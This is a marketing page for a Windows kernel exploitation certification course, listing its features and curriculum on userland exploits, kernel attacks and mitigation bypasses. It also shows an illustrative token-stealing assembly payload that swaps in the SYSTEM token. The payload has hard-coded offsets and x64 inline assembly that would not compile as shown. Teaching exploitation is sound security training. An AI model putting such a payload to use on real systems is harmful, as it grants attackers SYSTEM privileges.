Certified Windows Research & Exploitation

Go beyond user mode. Learn how to reverse engineer, debug, and exploit the Windows Kernel directly from industry experts.

Course Overview

The Certified Windows Research & Exploitation (CWRE) is an advanced certification designed for security researchers who want to master the Windows Kernel.

You will start by understanding the Windows internals, moving to advanced userland exploitation, and finally diving deep into the kernel (ring 0).

  • 100+ Hours of Content
  • Private Discord Community
  • 30+ Hands-on Kernel Labs
  • Lifetime Access & Updates
  • 1 exam voucher included for the CWRE exam

// Windows Kernel Exploitation Payload
#include <windows.h>

void TokenStealingPayload() {
    // Hyper-optimized assembly for token stealing
    __asm {
        push rax
        mov  rax, gs:[188h]   ; CurrentThread (_KTHREAD)
        mov  rax, [rax+0xB8]  ; ApcState.Process (_EPROCESS)
        mov  rcx, rax         ; Store Current Process

    __loop:
        mov  rax, [rax+0x448] ; ActiveProcessLinks
        sub  rax, 0x448
        cmp  [rax+0x440], 4   ; UniqueProcessId == 4 (SYSTEM)
        jne  __loop

        mov  rdx, [rax+0x4B8] ; Get SYSTEM Token
        mov  [rcx+0x4B8], rdx ; Replace our Token
        pop  rax
    }
}

Deep Dive Curriculum

Module 1

Advanced Windows Userland Exploitation

  • PE file format deep dive: headers, sections, imports, exports
  • PE loader internals and DLL loading mechanisms
  • PEB and TEB structures in exploitation
  • Windows memory layout and address space organization
  • Advanced stack buffer overflow & Stack pivoting
  • ROP: advanced chain construction, automated gadget discovery
  • JOP and COP (Jump/Call Oriented Programming)
  • SEH and SafeSEH exploitation on legacy/modern targets
  • Windows Heap Manager: NT Heap, LFH, Segment Heap
  • Heap spraying and grooming techniques
  • Use-after-free & Type confusion vulnerabilities
  • Mitigation Bypasses: DEP, ASLR, CFG, CET, ACG, CIG

Module 2

Windows Kernel Exploitation

  • NT kernel design: HAL, Executive, Object Manager, Memory Manager
  • System call mechanism: syscall/sysenter, SSDT
  • Kernel memory layout: Paged/Non-paged pools
  • Key Structures: EPROCESS, ETHREAD, TOKEN, OBJECT_HEADER
  • Token-based access control & Integrity Levels
  • Windows Driver Model (WDM) & KMDF overview
  • IOCTL fuzzing & DeviceIoControl interaction
  • Vulnerability classes: Stack/Heap overflow, Arbitrary R/W, Race conditions
  • Pool Exploitation: Legacy & Modern Segment Pool (Win 21H2+)
  • Arbitrary Read/Write primitives construction
  • Token Stealing & Privilege Escalation
  • Data-only attacks (No Code Exec) & BYOVD methodology
  • Win32k exploitation: GDI and USER object abuse

Module 3

Advanced Mitigations & Modern Bypass

  • kCFG: Kernel Control Flow Guard analysis & bypass
  • kCET: Kernel Shadow Stack impact
  • SMEP & SMAP bypass techniques
  • VBS (Virtualization Based Security) architecture
  • HVCI (Hypervisor-Protected Code Integrity) restrictions
  • Credential Guard & VTL 0/1 isolation
  • Exploitation in VBS/HVCI environments (Data-only attacks)
  • Attacking the Hypervisor: Theoretical attack surface
  • Windows Defender Exploit Guard & ASR rules
  • XFG (eXtended Flow Guard) & KDP (Kernel Data Protection)
  • Secure Launch (DRTM) & Measured Boot
  • Browser-to-kernel & Office-to-kernel chains
  • Full Chain Development: Access -> Sandbox Escape -> Kernel -> System

Bonus Content

Living Curriculum - Added Monthly

  • New exploit techniques as they are discovered (0-days analysis)
  • Hyper-V research and virtualization escapes
  • Windows Kernel Fuzzing methodologies (w/ Syzkaller & customized fuzzers)
  • Reverse Engineering hidden kernel components

Lifetime updates included with certification.